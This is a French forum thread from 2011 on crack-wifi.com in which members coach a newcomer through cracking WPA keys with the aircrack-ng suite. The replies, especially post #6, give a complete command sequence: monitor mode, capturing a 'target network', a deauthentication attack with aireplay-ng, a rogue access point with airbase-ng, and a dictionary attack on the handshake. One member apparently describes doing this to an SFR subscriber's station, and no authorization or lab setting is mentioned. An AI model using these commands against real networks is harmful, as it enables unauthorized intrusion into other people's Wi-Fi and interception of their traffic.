Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 17-02-2011 20:39:04

Linke741
Membre
Inscription : 17-02-2011
Messages : 10

Problème "Airodump-ng: l'écoute des réseaux"

Bonjours à tout je suis nouveau sur ce forum et j'aurai besoin d'aide pour le TUTO: "Crack de clé WPA sous Backtrack 2."

J'en suis à l'étape "3/ Airodump-ng: l'écoute des réseaux" et à partir  de se moment je ne comprend pas ceci:

"Airodump-ng permet d'écouter les réseaux wifi et éventuellement d'enregistrer les paquets dans un fichier de capture. Les commandes sont assez simples:

usage: airodump-ng <options> <interface>[,<interface>,...]"

J'ai vu par rapport à ce TUTO: "Crack de clé WEP sous Backtrack 3 beta avec la suite Aircrack-ng" qu'il fallait remplacer <option> <interface> ect. par des données mais le problème c'est que je ne sais pas où les trouver.

Merci d'avance pour vos réponses

Linke741

Dernière modification par Linke741 (17-02-2011 20:39:31)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 17-02-2011 22:38:48

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Problème "Airodump-ng: l'écoute des réseaux"

Salut wink

Alors partons du principe que le réseau s'appelle machin et qu'il est sur le canal 6 et que son bssid et 00:11:22:33:44:55 sa donnera tous simplement:

airodump-ng -w fichierdecapture -c 6 --bssid 00:11:22:33:44:55 mon0

-w fichierdecapture le nom du fichier qui va enregistrer ce qui se passe sur le réseau, -c c'est le canal, --bssid l'adresse du réseau, mon0 ton interface en mode moniteur

Pas bien compliquer tongue

Hors Ligne

#3 17-02-2011 23:04:43

Squaks
Membre Irremplaçable
Inscription : 18-06-2009
Messages : 974

Re : Problème "Airodump-ng: l'écoute des réseaux"

Je rajoute juste une petite précision : l'interface en mode monitor s'obtient avec la commande

airmon-ng start <interface>

Ton nom d'interface s'obtient avec

iwconfig

Sharkoff

Hors Ligne

#4 17-02-2011 23:23:48

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Problème "Airodump-ng: l'écoute des réseaux"

Bien vu smile j'ai tendance a aller trop vite dans mes post

Hors Ligne

#5 18-02-2011 11:04:49

Linke741
Membre
Inscription : 17-02-2011
Messages : 10

Re : Problème "Airodump-ng: l'écoute des réseaux"

ok merci bien je vais testé pour voir si j'y arrive.

Hors Ligne

#6 19-02-2011 11:16:45

twone66
Membre Indéboulonnable
Inscription : 17-01-2011
Messages : 116

Re : Problème "Airodump-ng: l'écoute des réseaux"

Bjr,

Pour ton information tu as intêret à télécharger Batrack 4 R2. C'est le système le plus complet actuellement. Une fois télécharger il faut faire un DVD live Iso.

Sous windows tu as un programme gatuit à télécharger c'set ISO RECORDER 3.1 qui te permet de faire un ISO de ton DVD live de Batrack 4. Une fois ton DVD live créer, attention à la vitesse de gravure x 4, tu redemarres ton PC avec avec ton DVD dans le lecteur.

Tu prends la 1ère option que t'offre bat 4 pour la configuration pour la carte video, il rectifira ensuite suivant les possibilités de ta carte vidéo.

quand le live DVD a fini tu marque stqrtx pour accéder à la console.

 

1ère commande après avoir choisi ta langue : iwconfig

2ème commande airmon-ng start wlan0

ton écran dois t'indiquer monitor enable mon0.

 

3ème commande : airodump-ng --encrypt wpa mon0

tu as l'ensemble des réseaux présents ou tu peux choisir le réseau cible sur lequel tu veux développer ton attaque.

par exemple : ton reseau 00:11:22:33:44:55 canal 6 essid ou nom de la station livebox xx.

 

4ème commande : airodump-ng -w out  --encrypt wpa -c 6 --bssid 00:11:22:33:44:55 mon0

quand tu vois apparaître sur la 2ème ligne le bssid et la station : exemple :04:df:gd:08:05:fc , tu ouvre une 2ème shell et tu développe ton attaque aireplay-ng.

 

5ème commande : aireplay-ng  - 0 20  -a 00:11:22:33:44:55  -c 04:df:gd:08:05:fc mon0

tu peux tester aussi la commande suivante dans une 3ème shell :

 

airbase-ng -c 6 -e livebox xx -a 00:11:22:33:44:55 -0 -s Mon0

tu devrais obtenir un handshake, pour le controler s'il n'apparaît pas,

tu tapes aircrack-ng *.cap

Si tu as ton handshake tu peux lancer ton attaque avec la commande aircrack -ng.

tu as besoin d'un dico, pour se faire il te faut l'avoir mis sur une clé USB, elle te servira aussi à y mettre ton handshake, ce qui te permettra de developper dans le futur d'autre attaque . tu peux accéder à ta clé usb par konqueror , media, tu auras ta clé glisse ton dico sur le bureau il va se copier et glisse ton handshake sur ta clé.

tu développe aircrack-ng avec ton dico exp: wpalist. txt

aircrack-ng -w wpalist.txt out-01-.cap

ton attque se déroule.

twone66 big_smile et big_smile

Hors Ligne

#7 19-02-2011 11:25:12

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Problème "Airodump-ng: l'écoute des réseaux"

Je vois que twone66 s'ameliore sa fait plaisir smile petite correction cependant:

tu devrais obtenir un handshake, pour le controler s'il n'apparaît pas,
tu tapes aircrack-ng *.cap

tu tapes aircrack-ng -w wpalist.txt fichierdecapture*.cap que quand tu as obtenu le handshake pas avant wink

Hors Ligne

#8 19-02-2011 11:36:30

twone66
Membre Indéboulonnable
Inscription : 17-01-2011
Messages : 116

Re : Problème "Airodump-ng: l'écoute des réseaux"

Re bjr,

Cher Koala,

je maintiens ma commande, car quand tu fais plusieurs essais avec -w out, tu peux  avoir 4 ou 5 fichiers de capture out-0x.cap.

Justement j'ai eu le cas cette semaine, sur une station sfr, je n'avais pas eu de handshake afficher et

en faisant la commande

aircrack-ng *.cap

tous les fichiers .cap ont été lu et sur ma 1ère attaque j'avais un handshake non marqué et un 2ème handshake sur une autre station. L'intêret de cette commande c'est qu'elle donne le nom de l'essid et le handshake.

enfin pour finir, cela me convient impeccable.

amitiés twone66 nux

Hors Ligne

#9 19-02-2011 12:26:06

Linke741
Membre
Inscription : 17-02-2011
Messages : 10

Re : Problème "Airodump-ng: l'écoute des réseaux"

Merci beaucoup pour votre aide mais maintenant je suis face à un autre GROS problème http://www.crack-wifi.com/forum/viewtopic.php?id=5373

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
4 183 04-12-2016 16:20:59 par pwerrick
8 227 26-11-2016 00:02:49 par koala
Problème reaver par Antho3674
4 304 15-11-2016 22:05:12 par kcdtv
5 1858 21-08-2016 19:48:53 par M!C
3 343 14-08-2016 10:22:07 par MiscL

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.025 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]